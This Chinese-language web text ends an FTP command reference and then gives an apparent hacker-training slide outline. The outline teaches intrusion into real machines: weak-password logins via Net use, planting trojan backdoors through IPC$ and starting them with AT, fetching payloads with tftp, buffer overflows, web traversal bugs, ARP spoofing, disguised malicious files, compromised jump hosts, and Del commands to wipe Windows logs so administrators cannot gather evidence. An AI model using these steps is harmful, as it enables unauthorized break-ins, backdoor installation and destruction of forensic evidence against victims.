44.proxy ftp-cmd:在次要控制连接中,执行一条ftp命令, 该命令允许连接两个ftp服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务器间的连接。
45.put local-file[remote-file]:将本地文件local-file传送至远程主机。
46.pwd:显示远程主机的当前工作目录。
47.quit:同bye,退出ftp会话。
48.quote arg1,arg2...:将参数逐字发至远程ftp服务器,如:quote syst.49.recv remote-file[local-file]:同get。
50.reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。
51.rhelp[cmd-name]:请求获得远程主机的帮助。
52.rstatus[file-name]:若未指定文件名,则显示远程主机的状态, 否则显示文件状态。
53.rename[from][to]:更改远程主机文件名。
54.reset:清除回答队列。
55.restart marker:从指定的标志marker处,重新开始get或put,如:restart 130。
56.rmdir dir-name:删除远程主机目录。
57.runique:设置文件名只一性存储,若文件存在,则在原文件后加后缀.1, .2等。
58.send local-file[remote-file]:同put。
59.sendport:设置PORT命令的使用。
60.site arg1,arg2...:将参数作为SITE命令逐字发送至远程ftp主机。
61.size file-name:显示远程主机文件大小,如:site idle 7200。
62.status:显示当前ftp状态。
63.struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。
64.sunique:将远程主机文件名存储设置为只一(与runique对应)。
65.system:显示远程主机的操作系统类型。
66.tenex:将文件传输类型设置为TENEX机的所需的类型。
67.tick:设置传输时的字节计数器。
68.trace:设置包跟踪。
69.type[type-name]:设置文件传输类型为type-name,缺省为ascii,如:type binary,设置二进制传输方式。
70.umask[newmask]:将远程服务器的缺省umask设置为newmask,如:umask 3
71.user user-name[password][account]:向远程主机表明自己的身份,需要口令时,必须输入口令,如:user anonymous my@email。
72.verbose:同命令行的-v参数,即设置详尽报告方式,ftp 服务器的所有响 应都将显示给用户,缺省为on.
73.?[cmd]:同help.




【hacker必学】必须要掌握的几个命令·Net·netsh·Ftp·hostname·Telenet(nc)·tracert·At·Tftp·Netstat·Regedit·Ping
必须要掌握的几个协议·http·dns·ftp·Pop·Smtp

·Icmp·Udp·tcp
开始·掌握了黑客攻击的方式和手段后,那么学习黑客就简单多了!·因为你掌握了这些,剩余的就是使用工具入侵·熟悉掌握一套自己用的黑客工具
高级·自己编写专用的黑客工具·自己发现系统漏洞
黑客入侵手段·收集信息:·   收集要入侵的目标信息·   IP,域名,端口,漏洞,位置
弱口令·在nt\2000\xp\2003中弱口令可以用·Net use \ip “password” /user:user·如果目标机开3389服务,可以直接连接

·在sql的sa弱口令,可以用sql连接器直接 ·登陆
后门木马·如果有ipc$共享,可以copy过去木马后门·用at启动·AT \ip time /INTERACTIVE·如果可以得到shell,也可以用tftp·Tftp.exe ?Ci ip get *.* *.*·然后直接安装 ·如果有3389,可以自己建一个iis,下载 直接运行
密码破解·远程破解mysql,mssql,ftp,mail,共享密码·本地破解管理员(administrator)密码
缓冲溢出·可以用缓冲溢出攻击,·比如流行的webdev,rdcom模块漏洞·可以直接得到system管理权限·缓冲溢出后的一般现象是:·Microsoft Windows 2000 [Version 5.00.2195]  (C) Copyright 1985-2000 Microsoft Corp.  C:\WINNT\system32>
 
Web服务漏洞·例如:·Unicode漏洞遍历磁盘和执行程序·二次编码漏洞遍历磁盘和执行程序·.HTR漏洞查看源代码
嗅探监听·例如:·针对web监听·针对mail监听·工具如:sinffer , iris
欺骗攻击·例如:·运用arp欺骗攻击
伪装欺骗·常见的如:mail病毒·把一个文件改名字甚至图标,欺骗对方执行
社会工程学

·例如:·QQ聊天诱惑·EMAIL信息·电话·诱惑
拒绝服务·例如:·Dos攻击·Ddos攻击
利用跳板·利用自己的肉鸡作为跳板攻击别的机器·My PC------>跳板(肉鸡)--->目标
路由器漏洞·如:·原始密码·程序漏洞
防火墙·利用欺骗攻击防火墙,导致防火墙功能失效

·利用防火墙的模块漏洞
unix/linux·NetWare Linux unix solais Solaris hp-unix Aix 等·这些目前先不讲解
精通黑客工具·必须有一套自己可以完全掌握的黑客工具·如端口扫描 Nscan,bluescanport·监听工具:sinffer iris·telnet工具:nc·扫描工具:sss,nmap, LANguard·后门工具:radmin,winshell·密码破解:lc4·远程管理:pcanywhere·会使用各种经典的黑客工具
清除日志·在你入侵机器以后,离开的时候,要完全清除·自己在那台机器上留下的痕迹·例如清除·Del C:\WINNT\system32\LogFiles\*.*

·Del C:\WINNT\system32\*.log·Del C:\WINNT\system32\*.txt·Del C:\WINNT\*.log·Del c:\winnt\*.txt
如果你不清除日志·当目标机器的管理员发现你的证据·完全可以让你在大墙内渡过一段日子
黑客·当你完全掌握这些后·你就成为了一名小黑客
高级·编写自己的黑客工具·发现系统漏洞
高级黑客·目前你足以成为一个高级黑客了
真正的黑客·精通各种网络协议

·精通操作系统·精通编程技术·精通安全防护·不搞破坏·挑战技术难题
结束·想学好这些,并不是靠别人给你的,而是靠自己的努力,自己的自学得到的!·别人只能指导你,怎么去做,只能告诉方法,·真正的实施是你自己,经过N*N个日夜努力换来的·不要一个问题问多次,要多动手,动脑!·Google里面有太多的答案,为什么我搜索不到?因为你的关键字用的不对!·黑客基地是为了培养出一批优秀的网络人才,让更多想学习网络的爱好者有一个理想的学习环境·这三篇幻灯片是我们多年的经验得到的!·很有价值,望好好保存!仔细研究!